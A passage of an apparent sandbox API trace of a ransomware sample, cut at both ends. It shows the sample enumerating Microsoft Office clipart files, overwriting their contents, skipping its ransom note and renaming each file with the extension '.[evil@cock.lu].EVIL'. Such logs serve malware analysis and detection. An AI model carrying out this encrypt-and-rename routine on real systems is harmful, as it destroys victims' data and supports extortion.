returned 1 [0168.850] CloseHandle (hObject=0x1a8) returned 1 [0168.850] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.851] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.851] __uncaught_exception () returned 0x84b1160800 [0168.851] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.851] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf.[evil@cock.lu].evil")) returned 1 [0168.852] ??_V@YAXPEAX@Z () returned 0x1 [0168.855] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF", dwFileAttributes=0x200) returned 0 [0168.855] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.855] wcsstr (_Str="SO00221_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.855] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF") returned 69 [0168.855] wcscmp (_String1="SO00221_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.855] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00221_.WMF") returned 0x0 [0168.855] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF") returned 0x45 [0168.855] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.857] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f74, lpOverlapped=0x0) returned 1 [0168.863] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.863] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.864] _errno () returned 0x84b1160840 [0168.864] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.864] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f80, lpOverlapped=0x0) returned 1 [0168.864] CloseHandle (hObject=0x1a8) returned 1 [0168.864] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.864] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.864] __uncaught_exception () returned 0x84b1160800 [0168.864] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.865] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf.[evil@cock.lu].evil")) returned 1 [0168.865] ??_V@YAXPEAX@Z () returned 0x1 [0168.868] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF", dwFileAttributes=0x200) returned 0 [0168.868] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.868] wcsstr (_Str="SO00222_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.868] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF") returned 69 [0168.868] wcscmp (_String1="SO00222_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.868] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00222_.WMF") returned 0x0 [0168.868] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF") returned 0x45 [0168.868] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.870] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e5c, lpOverlapped=0x0) returned 1 [0168.878] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.878] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.878] _errno () returned 0x84b1160840 [0168.878] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.878] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e60, lpOverlapped=0x0) returned 1 [0168.878] CloseHandle (hObject=0x1a8) returned 1 [0168.878] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.878] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.879] __uncaught_exception () returned 0x84b1160800 [0168.879] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.879] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf.[evil@cock.lu].evil")) returned 1 [0168.880] ??_V@YAXPEAX@Z () returned 0x1 [0168.883] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF", dwFileAttributes=0x200) returned 0 [0168.884] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.884] wcsstr (_Str="SO00223_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.884] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF") returned 69 [0168.884] wcscmp (_String1="SO00223_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.884] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00223_.WMF") returned 0x0 [0168.884] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF") returned 0x45 [0168.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.886] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3642, lpOverlapped=0x0) returned 1 [0168.894] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.894] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.894] _errno () returned 0x84b1160840 [0168.894] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.894] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3660, lpOverlapped=0x0) returned 1 [0168.894] CloseHandle (hObject=0x1a8) returned 1 [0168.895] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.895] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.895] __uncaught_exception () returned 0x84b1160800 [0168.895] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.895] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf.[evil@cock.lu].evil")) returned 1 [0168.897] ??_V@YAXPEAX@Z () returned 0x1 [0168.900] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF", dwFileAttributes=0x200) returned 0 [0168.901] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.901] wcsstr (_Str="SO00257_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.901] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF") returned 69 [0168.901] wcscmp (_String1="SO00257_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.901] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00257_.WMF") returned 0x0 [0168.901] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF") returned 0x45 [0168.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.903] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x476e, lpOverlapped=0x0) returned 1 [0168.913] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.913] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.913] _errno () returned 0x84b1160840 [0168.913] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.913] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4780, lpOverlapped=0x0) returned 1 [0168.913] CloseHandle (hObject=0x1a8) returned 1 [0168.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.914] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.914] __uncaught_exception () returned 0x84b1160800 [0168.914] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.914] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf.[evil@cock.lu].evil")) returned 1 [0168.915] ??_V@YAXPEAX@Z () returned 0x1 [0168.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF", dwFileAttributes=0x200) returned 0 [0168.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.918] wcsstr (_Str="SO00289_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF") returned 69 [0168.918] wcscmp (_String1="SO00289_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00289_.WMF") returned 0x0 [0168.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF") returned 0x45 [0168.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd8e0, lpOverlapped=0x0) returned 1 [0168.925] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.925] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.925] _errno () returned 0x84b1160840 [0168.925] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.925] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xd900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd900, lpOverlapped=0x0) returned 1 [0168.926] CloseHandle (hObject=0x1a8) returned 1 [0168.926] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.926] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.926] __uncaught_exception () returned 0x84b1160800 [0168.926] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf.[evil@cock.lu].evil")) returned 1 [0168.927] ??_V@YAXPEAX@Z () returned 0x1 [0168.930] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF", dwFileAttributes=0x200) returned 0 [0168.930] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.930] wcsstr (_Str="SO00299_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.930] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF") returned 69 [0168.930] wcscmp (_String1="SO00299_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.930] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00299_.WMF") returned 0x0 [0168.930] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF") returned 0x45 [0168.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.932] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10cb8, lpOverlapped=0x0) returned 1 [0168.939] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.939] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.939] _errno () returned 0x84b1160840 [0168.939] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.940] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x10cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10cc0, lpOverlapped=0x0) returned 1 [0168.940] CloseHandle (hObject=0x1a8) returned 1 [0168.940] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.940] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.940] __uncaught_exception () returned 0x84b1160800 [0168.940] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.940] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf.[evil@cock.lu].evil")) returned 1 [0168.941] ??_V@YAXPEAX@Z () returned 0x1 [0168.944] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF", dwFileAttributes=0x200) returned 0 [0168.944] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.944] wcsstr (_Str="SO00305_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.944] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF") returned 69 [0168.944] wcscmp (_String1="SO00305_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.945] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00305_.WMF") returned 0x0 [0168.945] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF") returned 0x45 [0168.945] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.946] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7a04, lpOverlapped=0x0) returned 1 [0168.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.953] _errno () returned 0x84b1160840 [0168.954] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.954] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a20, lpOverlapped=0x0) returned 1 [0168.954] CloseHandle (hObject=0x1a8) returned 1 [0168.954] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.954] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.954] __uncaught_exception () returned 0x84b1160800 [0168.954] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf.[evil@cock.lu].evil")) returned 1 [0168.955] ??_V@YAXPEAX@Z () returned 0x1 [0168.958] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF", dwFileAttributes=0x200) returned 0 [0168.959] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.959] wcsstr (_Str="SO00333_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.959] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF") returned 69 [0168.959] wcscmp (_String1="SO00333_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.959] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00333_.WMF") returned 0x0 [0168.959] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF") returned 0x45 [0168.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.961] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xee4a, lpOverlapped=0x0) returned 1 [0168.968] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.968] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.968] _errno () returned 0x84b1160840 [0168.968] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.968] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xee60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee60, lpOverlapped=0x0) returned 1 [0168.968] CloseHandle (hObject=0x1a8) returned 1 [0168.968] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.968] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.969] __uncaught_exception () returned 0x84b1160800 [0168.969] fclose (in: _File=0x7ffc020ee2a0 | out: 